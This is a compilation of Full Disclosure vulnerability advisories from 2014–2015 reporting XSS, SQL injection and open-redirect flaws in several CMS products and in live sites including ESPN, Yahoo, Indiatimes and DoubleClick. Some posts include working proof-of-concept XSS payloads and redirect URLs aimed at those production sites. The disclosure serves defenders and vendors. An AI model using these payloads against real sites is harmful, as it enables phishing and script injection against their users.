*(2.2)* The second vulnerability occurs at “sitemap.php?” page with
“pageid”, “lang” multiple parameters.







*References:*
http://www.tetraph.com/security/cves/cve-2014-9558-smartcms-sql-injection-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9558
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9558
https://security-tracker.debian.org/tracker/CVE-2014-9558
http://www.cvedetails.com/cve/CVE-2014-9558/
http://www.security-database.com/detail.php?alert=CVE-2014-9558
http://packetstormsecurity.com/files/cve/CVE-2014-9558
http://www.pentest.it/cve-2014-9558.html
http://www.naked-security.com/cve/CVE-2014-9558/
http://007software.net/cve-2014-9558/







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-9557 SmartCMS Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-01-22 Thread Jing Wang
*CVE-2014-9557 SmartCMS Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*

Exploit Title: Smartwebsites SmartCMS v.2 Multiple XSS Security
Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9557
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]





*Advisory Details:*


*(1) Vendor  Product Description*

*Vendor: *Smartwebsites

*Product  Version:* SmartCMS v.2

*Vendor URL  Download:*
http://www.smartwebsites.com.cy/index.php?pageid=13lang=en

*Product Description: *
“SmartCMS is one of the most user friendly and smart content management
systems there is in the Cyprus market. It makes the content management of a
webpage very easy and simple, regardless of the user’s technical skills.”



*(2) Vulnerability Details:*

SmartCMS v.2 has a security problem. It can be exploited by XSS attacks.

*(2.1) *The first vulnerability occurs at “index.php?” page with “pageid”
“lang” multiple parameters.

*(2.2)* The second vulnerability occurs at “sitemap.php?” page with
“pageid” “lang” multiple parameters.







*References:*
http://www.tetraph.com/security/cves/cve-2014-9557-smartcms-multiple-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9557
https://security-tracker.debian.org/tracker/CVE-2014-9557
http://www.cvedetails.com/cve/CVE-2014-9557/
http://www.security-database.com/detail.php?alert=CVE-2014-9557
http://packetstormsecurity.com/files/cve/CVE-2014-9557
http://www.pentest.it/cve-2014-9557.html
http://www.naked-security.com/cve/CVE-2014-9557/
http://007software.net/cve-2014-9557/








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-9560 Softbb.net SoftBB SQL Injection Security Vulnerability

2015-01-10 Thread Jing Wang
*CVE-2014-9560  Softbb.net SoftBB SQL Injection Security Vulnerability*




Exploit Title: Softbb.net SoftBB /redir_last_post_list.php post Parameter
SQL Injection
Product: SoftBB (mods)
Vendor: Softbb.net
Vulnerable Versions: v0.1.3
Tested Version: v0.1.3
Advisory Publication: Jan 10, 2015
Latest Update: Jan 10, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') (CWE-89)
CVE Reference: CVE-2014-9560
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]






*Advisory Details:*


*Vendor URL:*
http://www.softbb.net/



*(2) Vulnerability Details:*
Softbb.net SoftBB can be exploited by SQL Injection attacks.


*(2.1) *The vulnerability occurs at “/redir_last_post_list.php page, with
“post” parameter.




*References:*
http://tetraph.com/security/cves/cve-2014-9560-softbb-net-softbb-sql-injection-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9560
http://www.cvedetails.com/cve/CVE-2006-1327/








--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-9561 Softbb.net SoftBB XSS (Cross-Site Scripting) Security Vulnerability

2015-01-10 Thread Jing Wang
CVE-2014-9561  Softbb.net SoftBB XSS (Cross-Site Scripting) Security
Vulnerability




Exploit Title: Softbb.net SoftBB /redir_last_post_list.php post Parameter
XSS
Product: SoftBB (mods)
Vendor: Softbb.net
Vulnerable Versions: v0.1.3
Tested Version: v0.1.3
Advisory Publication: Jan 10, 2015
Latest Update: Jan 10, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9561
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*Vendor URL:*
http://www.softbb.net/



*(2) Vulnerability Details:*
Softbb.net SoftBB can be exploited by XSS Attacks.


*(2.1) *The vulnerability occurs at “/redir_last_post_list.php page, with
“post” parameter.






*References:*
http://tetraph.com/security/cves/cve-2014-9561-softbb-net-softbb-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9561
http://www.cvedetails.com/cve/CVE-2006-4593/







--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-8752 JCE-Tech Video Niche Script XSS (Cross-Site Scripting) Security Vulnerability

2014-12-18 Thread Jing Wang
*CVE-2014-8752 JCE-Tech Video Niche Script XSS (Cross-Site Scripting)
Security Vulnerability*



Exploit Title: JCE-Tech Video Niche Script /view.php Multiple Parameters
XSS
Product: Video Niche Script
Vendor: JCE-Tech
Vulnerable Versions: 4.0
Tested Version: 4.0
Advisory Publication: Nov 18, 2014
Latest Update: Nov 18, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8752
Credit: Wang Jing [CCRG, Nanyang Technological University, Singapore]




*Advisory Details:*


*(1) Vendor URL:*
http://jce-tech.com/products/


*Product Description:*
The PHP Video Script instantly creates a niche video site based on
keywords users control via the admin console. The videos are displayed  on
users' site, but streamed from the YouTube servers.




*(2) Vulnerability Details.*

JCE-Tech Video Niche Script is vulnerable to XSS attacks.


*(2.1)* The vulnerability occurs at view.php page with video, title
parameters.





*References:*

http://tetraph.com/security/cves/cve-2014-8752-jce-tech-video-niche-script-xss-cross-site-scripting-security-vulnerability/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8752

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2014-8490 TennisConnect COMPONENTS System XSS (Cross-Site Scripting) Security Vulnerability

2014-12-18 Thread Jing Wang
*CVE-2014-8490  TennisConnect COMPONENTS System XSS (Cross-Site Scripting)
Security Vulnerability*




Exploit Title: TennisConnect TennisConnect COMPONENTS System /index.cfm
pid Parameter XSS
Product: TennisConnect COMPONENTS System
Vendor: TennisConnect
Vulnerable Versions: 9.927
Tested Version: 9.927
Advisory Publication: Nov 18, 2014
Latest Update: Nov 18, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8490
Credit: Wang Jing [CCRG, Nanyang Technological University, Singapore]









*Advisory Details:*


*(1) Vendor URL:*
http://www.tennisconnect.com/products.cfm#Components


*Product Description:*
TennisConnect COMPONENTS
* Contact Manager (online player database)
* Interactive Calendar including online enrollment
* League  Ladder Management through Tencap Tennis
* Group Email (including distribution lists, player reports, unlimited
sending volume and frequency)
* Multi-Administrator / security system with Page Groups
* Member Administration
* MobileBuilder
* Online Tennis Court Scheduler
* Player Matching (Find-a-Game)
* Web Site Builder (hosted web site and editing tools at www. your domain
name .com)




*(2) Vulnerability Details:*

TennisConnect COMPONENTS System is vulnerable to XSS attacks.


*(2.1)* The vulnerability occurs at /index.cfm? page, with pid
parameter.








*References:*
http://tetraph.com/security/cves/cve-2014-8490-tennisconnect-components-system-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8490








--

Wang Jing

School of Physical and Mathematical Sciences

Nanyang Technological University, Singapore

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Yahoo Yahoo.com Yahoo.co.jp Open Redirect Security Vulnerabilities

2014-12-18 Thread Jing Wang
*Yahoo Yahoo.com Yahoo.co.jp http://Yahoo.co.jp Open Redirect Security
Vulnerabilities*



Though Yahoo lists open redirect vulnerability on its bug bounty program.
However, it seems Yahoo do not take this vulnerability seriously at all.

Multiple Open Redirect vulnerabilities were reported Yahoo. All Yahoo's
responses were this intended behavior. However, these vulnerabilities
were patched later.

Several other security researcher complained about getting similar
treatment, too.
http://seclists.org/fulldisclosure/2013/Nov/198
http://seclists.org/fulldisclosure/2014/Jan/51
http://seclists.org/fulldisclosure/2014/Feb/119


All Open Redirect Vulnerabilities are intended behavior? If so, why patch
them later?



The vulnerability can be attacked without user login. Tests were performed
on Firefox (33.0) in Ubuntu (14.04) and IE (10.0.9200.16521 ) in Windows 8.




*(1) Yahoo.com Open Redirect*

*Vulnerable URLs:*
http://p2.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://help.yahoo.com/help/us/local/index.html

http://p3.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com

http://p4.ard.sp1.yahoo.com/SIG=153ldvf0k/M=289534.11126839.11694361.10790529/D=local/S=2022555687:FOOT3/Y=YAHOO/EXP=1237445081/L=ZtCl1QpJkUFoTlL2Sa2hlACvCkj1s0nBzbYACrCK/B=ygUAANiRN9w-/J=1237437881452401/A=4763404/R=8/*http://www.google.com



*Poc Video:*
https://www.youtube.com/watch?v=k4eFLsTyZkg

*Another Video Published Before:*
https://www.youtube.com/watch?v=GTd1Gkj6OUY


*Blog:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-open-redirect-security.html
http://securityrelated.blogspot.com/2014/10/yahoo-open-redirect-vulnerability.html






*(2) Yahoo.co.jp http://Yahoo.co.jp Open Redirect*

Use one of webpages for the following tests. The webpage address is 
http://www.inzeed.com/kaleidoscope;. Suppose that this webpage is malicious.

*Vulnerable URL:*
http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030344COOKIE_PATH=/COOKIE_DOMAIN=.yahoo.co.jpVIEW_URL=http%3A%2F%2Fshopping.yahoo.co.jp

*POC:*
http://order.store.yahoo.co.jp/cgi-bin/yj-affiliate-entry?ITRACK_INFO=087836355102152107140219030330COOKIE_PATH=/COOKIE_DOMAIN=.yahoo.co.jpVIEW_URL=http://www.inzeed.com/kaleidoscope



*Poc Video:*
https://www.youtube.com/watch?v=2SM78WKAVr8feature=youtu.be

*Blog:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocojp-open-redirect-security.html






Reported by:
Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore
http://www.tetraph.com/wangjing






*Blog Details:*
http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2014-8751 goYWP WebPress Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2014-12-09 Thread Jing Wang
*CVE-2014-8751  goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*







Exploit Title: goYWP WebPress Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities
Product: WebPress
Vendor: goYWP
Vulnerable Versions: 13.00.06
Tested Version: 13.00.06
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8751
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details:*

*(1) Product*
WebPress is the foundation on which we build web sites. It’s our unique
Content Management System (CMS), flexible enough for us to build your dream
site, and easy enough for you to maintain it yourself.



*(2) Vulnerability Details:*
goYWP WebPress is vulnerable to XSS attacks.

*(2.1)* The first security vulnerability occurs at /search.php page with
search_param parameter in HTTP GET.

*(2.2)* The second security vulnerability occurs at /forms.php (form
submission ) page with name, address comment parameters in HTTP
POST.










*References:*
http://tetraph.com/security/cves/cve-2014-8751-goywp-webpress-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://www.goywp.com/view/cms
http://www.goywp.com/demo.php
http://cwe.mitre.org
http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-8489 Ping Identity Corporation PingFederate 6.10.1 SP Endpoints Dest Redirect Privilege Escalation Security Vulnerability

2014-12-09 Thread Jing Wang
*CVE-2014-8489 Ping Identity Corporation PingFederate 6.10.1 SP Endpoints
Dest Redirect Privilege Escalation Security Vulnerability*





Exploit Title: Ping Identity Corporation PingFederate 6.10.1 SP
Endpoints Dest Redirect Privilege Escalation Security Vulnerability
Product: PingFederate 6.10.1 SP Endpoints
Vendor: Ping Identity Corporation
Vulnerable Versions: 6.10.1
Tested Version: 6.10.1
Advisory Publication: Dec 09, 2014
Latest Update: Dec 09, 2014
Vulnerability Type: URL Redirection to Untrusted Site  [CWE-601]
CVE Reference: CVE-2014-8489
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]








*Advisory Details*



*(1) Product:*
PingFederate is a best-of-breed Internet-identity security platform that
implements multiple standards-based protocols to provide cross-domain
single sign-on (SSO) and user-attribute exchange, as well as support for
identity-enabled Web Services and cross-domain user provisioning.




*(2) Vulnerability Details:*
PingFederate 6.10.1 SP Endpoints is vulnerable to Dest Redirect Privilege
Escalation attacks.

The security vulnerability occurs at /startSSO.ping? page with
TargetResource parameter.







*References:*
http://tetraph.com/security/cves/cve-2014-8489-ping-identity-corporation-pingfederate-6-10-1-sp-endpoints-dest-redirect-privilege-escalation-security-vulnerability/
http://documentation.pingidentity.com/display/PF610/PingFederate+6.10
http://cwe.mitre.org
http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] ESPN espn.go.com Login Register Page XSS and Dest Redirect Privilege Escalation Security Vulnerabilities

2014-12-09 Thread Jing Wang
*ESPN espn.go.com http://espn.go.com/ Login  Register Page XSS and Dest
Redirect Privilege Escalation Security Vulnerabilities*





*Domain:*
http://espn.go.com/


**As of August 2013, ESPN is available to approximately 97,736,000 pay
television households (85.58% of households with at least one television
set) in the United States.[2]
http://en.wikipedia.org/wiki/ESPN#cite_note-2 In addition to the flagship
channel and its seven related channels in the United States, ESPN
broadcasts in more than 200 countries,[3]
http://en.wikipedia.org/wiki/ESPN#cite_note-ESPN_Inc-3 operating regional
channels in Australia http://en.wikipedia.org/wiki/Australia, Brasil
http://en.wikipedia.org/wiki/Brasil, Latin America
http://en.wikipedia.org/wiki/Latin_America and the United Kingdom
http://en.wikipedia.org/wiki/United_Kingdom, and owning a 20% interest in The
Sports Network http://en.wikipedia.org/wiki/The_Sports_Network (TSN) as
well as its five sister networks and NHL Network
http://en.wikipedia.org/wiki/NHL_Network_%28Canada%29 in Canada
http://en.wikipedia.org/wiki/Canada. (Wikipedia)






*Vulnerability description:*

Espn.go.com http://espn.go.com/ has a security problem. It is vulnerable
to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open
Redirect) attacks.


Those vulnerabilities are very dangerous. Since they happen at ESPN's
login  register pages that are credible. Attackers can abuse those
links to mislead ESPN's users. The success rate of attacks may be high.

During the tests, besides the links given above, large number of ESPN's
links are vulnerable to those attacks.


The vulnerability occurs at espn.go.com's login?  register pages
with redirect parameter, i.e.
http://streak.espn.go.com/en/login?redirect=
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=
https://register.go.com/go/sendMemberNames?regFormId=espnappRedirect=http://register.go.com/


Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601)
in Windows 8.






*(1) XSS Vulnerability*

*Vulnerable URLs:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459
http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPagelanguage=enaffiliateName=espnregFormId=reddit
https://register.go.com/go/sendMemberNames?aff_code=goappRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login


*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459;img
src=x onerror=prompt('justqdjing')
https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPagelanguage=enaffiliateName=espnregFormId=espn;img
src=x onerror=prompt('justqdjing')
http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate;img
src=x onerror=prompt('justqdjing')
https://register.go.com/go/sendMemberNames?aff_code=goappRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login;img
src=x onerror=prompt('justqdjing')




*Poc Video:*
https://www.youtube.com/watch?v=gGEZO8wbTBUfeature=youtu.be

*Blog Detail:*
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register-page-xss.html
http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html




*(2) Dest Redirect Privilege Escalation Vulnerability*

Use one of webpages for the following tests. The webpage address is 
http://www.diebiyi.com/;. Suppose that this webpage is malicious.


*(2.1) Login Page ** Dest Redirect Privilege Escalation Vulnerability*

*Vulnerable URL 1:*
https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial

*POC:*
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com


*Vulnerable URL 2:*
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828
http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2F101882723190828

*POC:*
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com



*(2.2) Vulnerabilities Attacked without User Login*

*Vulnerable URL 1:*
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoaurl=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112

[FD] CVE-2014-7291 Springshare LibCal XSS (Cross-Site Scripting) Vulnerability

2014-11-26 Thread Jing Wang
*Exploit Title: Springshare LibCal XSS (Cross-Site Scripting) Vulnerability*

Product: LibCal

Vendor: Springshare

Vulnerable Versions: 2.0

Tested Version: 2.0

Advisory Publication: Nov 25, 2014

Latest Update: Nov 25, 2014

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: CVE-2014-7291

CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 8.6

Solution Status: Fixed by Vendor

Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details*



*(1) Product:*

Springshare LibCal is an easy to use calendaring and event management
platform for libraries. Used by 1,600+ libraries worldwide.



*(2) Vulnerability Details:*

The XSS vulnerabilities occur at /api_events.php? page, with m and
cid parameters.



*(3) Solutions:*

2014-10-01: Report vulnerability to Vendor

2014-10-15: Vendor replied with thanks and vendor changed the source code









*References:*

http://tetraph.com/security/cves/cve-2014-7291-springshare-libcal-xss-cross-site-scripting-vulnerability/

http://www.springshare.com/libcal/

http://cwe.mitre.org

http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2014-8754 WordPress “Ad-Manager Plugin” Dest Redirect Privilege Escalation

2014-11-26 Thread Jing Wang
http://tetraph.com/security/open-redirect/cve-2014-8754-wordpress-ad-manager-plugin-dest-redirect-privilege-escalation/#respond

*CVE-2014-8754 WordPress “Ad-Manager Plugin” Dest Redirect Privilege
Escalation*





Exploit Title: WordPress Ad-Manager Plugin Dest Redirect Privilege
Escalation Vulnerability

Product: WordPress Ad-Manager Plugin

Vendor: CodeCanyon

Vulnerable Versions: 1.1.2

Tested Version: 1.1.2

Advisory Publication: Nov 25, 2014

Latest Update: Nov 25, 2014

Vulnerability Type: URL Redirection to Untrusted Site  [CWE-601]

CVE Reference: CVE-2014-8754

CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)

Impact Subscore: 4.9

Exploitability Subscore: 8.6

Credit: Wang Jing [SPMS, Nanyang Technological University, Singapore]







*Advisory Details*



*(1) Product:*

“WordPress Ad-Manager offers users a simple solution to implement
advertising into their posts, their blog or any other WordPress page. Users
can use pictures and images or HTML snippets like Google AdSense to
incorporate advertising in an easy way.”



*(2) Vulnerability Details:*

The Dest Redirect Privilege Escalation vulnerability occurs at
“track-click.php” page with “out” parameter.






*References:*

http://tetraph.com/security/cves/cve-2014-8754-wordpress-ad-manager-plugin-dest-redirect-privilege-escalation/

http://codecanyon.net/item/wordpress-admanager/544421

https://wordpress.org/plugins/ad-manager-for-wp/

http://cwe.mitre.org

http://cve.mitre.org/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/

[FD] All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (cross site scripting) Attacks

2014-11-26 Thread Jing Wang
*All Links in **Two Topics of Indiatimes (indiatimes.com
http://indiatimes.com/) Are Vulnerable to XSS (cross site scripting)
Attacks *




*Domain Description:*

http://www.indiatimes.com


According to the Indian Readership Survey (IRS) 2012, the Times of India
is the most widely read English newspaper in India with a readership of
7.643 million. This ranks the Times of India as the top English daily in
India by readership. (en.Wikipedia.org http://en.wikipedia.org/)







*Vulnerability description:*


The vulnerability occurs at Indiatimes's URL links. Indiatimes only filter
part of the filenames in its website. All URLs under Indiatimes's
photogallery and top-llists topics are affected.


Indiatimes uses part of the links under photogallery and top-llists
topics to construct its website content without any checking of those links
at all. This mistake is very popular in nowaday websites. Developer is not
security expert.



The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.





*POC Codes:*

http://www.indiatimes.com/photogallery/;img src=x
onerror=prompt('justqdjing')

http://www.indiatimes.com/top-lists/;img src=x
onerror=prompt('justqdjing')

http://www.indiatimes.com/photogallery/lifestyle/;img src=x
onerror=prompt('justqdjing')

http://www.indiatimes.com/top-lists/technology/;img src=x
onerror=prompt('justqdjing')





*POC Video:*

https://www.youtube.com/watch?v=EeJWu8_5BKUfeature=youtu.be


*Blog Details:*

http://securityrelated.blogspot.sg/2014/11/two-topics-of-indiatimes-indiatimescom.html






The vulnerabilities were reported to Indiatimes in early September, 2014.
However they are still unpatched.









Reported by:

Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.

http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities Can be Used by Spammers

2014-11-14 Thread Jing Wang
Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities
Can be Used by Spammers



Although Google does not include Open Redirect vulnerabilities in its bug
bounty program, its preventive measures against Open Redirect attacks have
been quite thorough and effective to date.

However, Google might have overlooked the security of its DoubleClick.net
http://doubleclick.net/ ​advertising system. After some test, it is found
that most of the redirection URLs within DoubleClick.net
http://doubleclick.net/ are vulnerable to Open Redirect vulnerabilities.
Many redirection are likely to be affected.

These redirections can be easily used by spammers, too.

Some URLs belong to Googleads.g.Doubleclick.net
http://googleads.g.doubleclick.net/ are vulnerable to Open Redirect
attacks, too. While Google prevents similar URL redirections other than
Googleads.g.Doubleclick.net http://googleads.g.doubleclick.net/. Attackers
can use URLs related to Google Account to make the attacks more powerful.

Moreover, these vulnerabilities can be used to attack other companies such
as Google, eBay, The New York Times, e.g. by bypassing their Open Redirect
filters(Covert Redirect).




*(1) Background Related to Google DoubleClick.net.*



*(1.1) What is DoubleClick.net?*

DoubleClick is the ad technology foundation to create, transact, and
manage digital advertising for the world's buyers, creators and sellers.
http://www.google.com.sg/doubleclick/



*(1.2) Reports Related to Google DoubleClick.net Used by Spammers*


*(1.2.1)*

Google DoublClick.net has been used by spammers for long time. The
following is a report in 2008.

The open redirect had become popular with spammers trying to lure users
into clicking their links, as they could be made to look like safe URLs
within Google's domain.
https://www.virusbtn.com/blog/2008/06_03a.xml?comments


*(1.2.2)*

Mitechmate published a blog related to DoubleClick.net spams in 2014.

Ad.doubleclick.net http://ad.doubleclick.net/ is recognized as a
perilous adware application that causes unwanted redirections when surfing
on the certain webpages. Actually it is another browser hijacker that aims
to distribute frauds to make money.Commonly people pick up Ad.doubleclick
virus when download softwares, browse porn site or read spam email
attachments. It enters into computer sneakily after using computer
insecurely.Ad.doubleclick.net http://insecurely.ad.doubleclick.net/ is
not just annoying, this malware traces users’ personal information, which
would be utilized for cyber criminal.
http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/


*(1.2.3)*

Malwarebytes posted a news related to DoubleClick.net malvertising in 2014.

Large malvertising campaign under way involving DoubleClick and Zedo
https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/




*(2) DoubleClick.net System URL Redirection Vulnerabilities Details.*

These vulnerabilities can be attacked without user login. Tests were
performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

Used webpages for the following tests. The webpage address is 
http://www.tetraph.com/security;. We can suppose that this webpage is
malicious.



*(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net
http://googleads.g.doubleclick.net/.*


*(2.1.1)*

Some URLs belong to googleads.g.doubleclick.net are vulnerable to Open
Redirect attacks. While Google prevents similar URL redirection other than
googleads.g.doubleclick.net.


Vulnerable URLs:
http://googleads.g.doubleclick.net/aclk?sa=Lai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYVnum=0sig=AOD64_2petJH0A9Zjj45GN117ocBukiroAclient=ca-pub-0466582109566532adurl=http://www.sharp-world.com/igzo

